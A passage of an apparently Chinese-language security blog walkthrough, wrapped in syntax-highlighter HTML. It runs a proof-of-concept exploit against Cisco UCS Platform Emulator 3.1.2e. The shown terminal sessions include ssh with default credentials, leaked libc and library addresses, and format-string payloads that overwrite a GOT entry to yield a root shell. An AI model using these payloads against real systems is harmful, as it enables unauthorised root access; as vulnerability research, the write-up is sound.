crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> mkfifo fifo1<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4da841046670-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4da841046670-1\"><span class=\"crayon-e\">mkfifo <\/span><span class=\"crayon-v\">fifo1<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0001 seconds] -->  <\/p>\n<li>\u521b\u5efa\u8f93\u51fa\u76ee\u5f55\uff1a<\/li>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a0b6bef4a4dc655164633\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> mkdir output<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4dc655164633-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4dc655164633-1\"><span class=\"crayon-e\">mkdir <\/span><span class=\"crayon-v\">output<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0001 seconds] -->  <\/p>\n<li>\u4f7f\u7528\u4ecefifo1\u91cd\u5b9a\u5411\u7684stdin\u8fd0\u884cssh\uff0c\u5e76\u5c06stdout\u91cd\u5b9a\u5411\u5230output\/log\u6587\u4ef6\uff1a<\/li>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a0b6bef4a4de224542327\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> tail -f fifo1 | ssh ucspe@192.168.1.43 &gt; output\/log    # use default credentials ucspe\/ucspe<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4de224542327-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4de224542327-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4de224542327-3\">3<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4de224542327-1\"><span class=\"crayon-v\">tail<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">f<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fifo1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ssh <\/span><span class=\"crayon-v\">ucspe<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-cn\">192.168.1.43<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">log<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4de224542327-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4de224542327-3\"><span class=\"crayon-p\"># use default credentials ucspe\/ucspe<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0004 seconds] -->  <\/p>\n<\/ol>\n<p>\u7136\u540e\uff0c\u7b2c\u4e8c\u4e2a\u7ec8\u7aef\u4e0a\u6267\u884c\u5982\u4e0b\u64cd\u4f5c\uff1a<\/p>\n<ol>\n<li>\u5c06\u5f53\u524d\u76ee\u5f55\u66f4\u6539\u4e3apoc<\/li>\n<li>\u8fd0\u884c poc4_ucspe_3.1.2e.py<\/li>\n<\/ol>\n<p>\u6267\u884c\u540e\u7684\u8f93\u51fa\u5982\u4e0b\uff1a<\/p>\n<p><u>\u7ec8\u7aef1<\/u><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a0b6bef4a4e0155256660\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> demo@kali:~\/poc$ mkfifo fifo1  demo@kali:~\/poc$ mkdir output  demo@kali:~\/poc$ tail -f fifo1 | ssh ucspe@192.168.1.43 &gt; output\/log  Pseudo-terminal will not be allocated because stdin is not a terminal.  The authenticity of host &#8216;192.168.1.43 (192.168.1.43)&#8217; can&#8217;t be established.  RSA key fingerprint is SHA256:qEdgqNFyfqA2BU1+cH9rmYrsIOiQr\/NlCpgAyzrX70Y.  Are you sure you want to continue connecting (yes\/no)? yes  Warning: Permanently added &#8216;192.168.1.43&#8217; (RSA) to the list of known hosts.  uucspe@192.168.1.43&#8217;s password:  TERM environment variable not set.<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e0155256660-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e0155256660-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e0155256660-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e0155256660-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e0155256660-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e0155256660-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e0155256660-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e0155256660-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e0155256660-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e0155256660-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e0155256660-1\"><span class=\"crayon-v\">demo<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">kali<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-o\">~<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">poc<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mkfifo <\/span><span class=\"crayon-e\">fifo1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e0155256660-2\"><span class=\"crayon-v\">demo<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">kali<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-o\">~<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">poc<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mkdir <\/span><span class=\"crayon-e\">output<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e0155256660-3\"><span class=\"crayon-v\">demo<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">kali<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-o\">~<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">poc<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">tail<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">f<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fifo1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ssh <\/span><span class=\"crayon-v\">ucspe<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-cn\">192.168.1.43<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">log<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e0155256660-4\"><span class=\"crayon-v\">Pseudo<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">terminal <\/span><span class=\"crayon-e\">will <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">be <\/span><span class=\"crayon-e\">allocated <\/span><span class=\"crayon-e\">because <\/span><span class=\"crayon-e\">stdin <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">terminal<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e0155256660-5\"><span class=\"crayon-e\">The <\/span><span class=\"crayon-e\">authenticity <\/span><span class=\"crayon-e\">of <\/span><span class=\"crayon-i\">host<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;192.168.1.43 (192.168.1.43)&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">can<\/span><span class=\"crayon-s\">&#8216;t be established.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e0155256660-6\"><span class=\"crayon-s\">RSA key fingerprint is SHA256:qEdgqNFyfqA2BU1+cH9rmYrsIOiQr\/NlCpgAyzrX70Y.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e0155256660-7\"><span class=\"crayon-s\">Are you sure you want to continue connecting (yes\/no)? yes<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e0155256660-8\"><span class=\"crayon-s\">Warning: Permanently added &#8216;<\/span><span class=\"crayon-cn\">192.168.1.43<\/span><span class=\"crayon-s\">&#8216; (RSA) to the list of known hosts.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e0155256660-9\"><span class=\"crayon-s\">uucspe@192.168.1.43&#8242;<\/span><span class=\"crayon-i\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e0155256660-10\"><span class=\"crayon-e\">TERM <\/span><span class=\"crayon-e\">environment <\/span><span class=\"crayon-e\">variable <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0013 seconds] -->  <\/p>\n<p><u>\u7ec8\u7aef2<\/u><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a0b6bef4a4e3822512303\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> demo@kali:~\/poc$ python poc4_ucspe_3.1.2e.py  Going through some menus please wait a moment..  You should now see on the other terminal message simmilar to &#8220;Error: Already in local-mgmt shell..&#8221;  [.] Dumping clicli::LocalMgmtSel::show(void*, base::String const&amp;) addres from libsamvsh.so      -&gt; 0x6b9f64  [.] Calculating _ZN7clidcos15CommandEmulator16cli_param_filterEPKc .got.plt      -&gt; 0x6d7a70  [.] Dumping snprintf address from libc      -&gt; 0x7791210  [.] Calculating libc system address      -&gt; libc base addr = 0x7746000      -&gt; system addr = 0x7780f60    [.] Sending payload..  show sel %62c%28$nAAA  show sel %237c%28$nAA  show sel %86c%28$nAAA  show sel %229c%28$nAA  Sleep for fork adjustment..  Ok please type your commands (type exit for exit)  &gt; id  [&#8216;uid=0(root) gid=0(root) groups=0(root)&#8217;]  &gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e3822512303-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e3822512303-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e3822512303-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e3822512303-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e3822512303-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e3822512303-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e3822512303-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e3822512303-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e3822512303-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e3822512303-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e3822512303-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e3822512303-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e3822512303-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e3822512303-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e3822512303-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e3822512303-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e3822512303-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e3822512303-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e3822512303-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e3822512303-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e3822512303-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6bef4a4e3822512303-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6bef4a4e3822512303-23\">23<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e3822512303-1\"><span class=\"crayon-v\">demo<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">kali<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-o\">~<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">poc<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">python <\/span><span class=\"crayon-v\">poc4_ucspe_3<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-cn\">1.2e.py<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e3822512303-2\"><span class=\"crayon-e\">Going <\/span><span class=\"crayon-e\">through <\/span><span class=\"crayon-e\">some <\/span><span class=\"crayon-e\">menus <\/span><span class=\"crayon-e\">please <\/span><span class=\"crayon-i\">wait<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">moment<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e3822512303-3\"><span class=\"crayon-e\">You <\/span><span class=\"crayon-e\">should <\/span><span class=\"crayon-e\">now <\/span><span class=\"crayon-e\">see <\/span><span class=\"crayon-e\">on <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">other <\/span><span class=\"crayon-e\">terminal <\/span><span class=\"crayon-e\">message <\/span><span class=\"crayon-e\">simmilar <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Error: Already in local-mgmt shell..&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e3822512303-4\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Dumping <\/span><span class=\"crayon-v\">clicli<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">LocalMgmtSel<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">show<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">base<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">const<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">addres <\/span><span class=\"crayon-e\">from <\/span><span class=\"crayon-v\">libsamvsh<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">so<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e3822512303-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x6b9f64<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e3822512303-6\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Calculating <\/span><span class=\"crayon-v\">_ZN7clidcos15CommandEmulator16cli_param<\/span><span class=\"crayon-sy\">_<\/span>filterEPKc<span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">got<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">plt<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e3822512303-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x6d7a70<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e3822512303-8\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Dumping <\/span><span class=\"crayon-e\">snprintf <\/span><span class=\"crayon-e\">address <\/span><span class=\"crayon-e\">from <\/span><span class=\"crayon-v\">libc<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e3822512303-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7791210<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e3822512303-10\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Calculating <\/span><span class=\"crayon-e\">libc <\/span><span class=\"crayon-e\">system <\/span><span 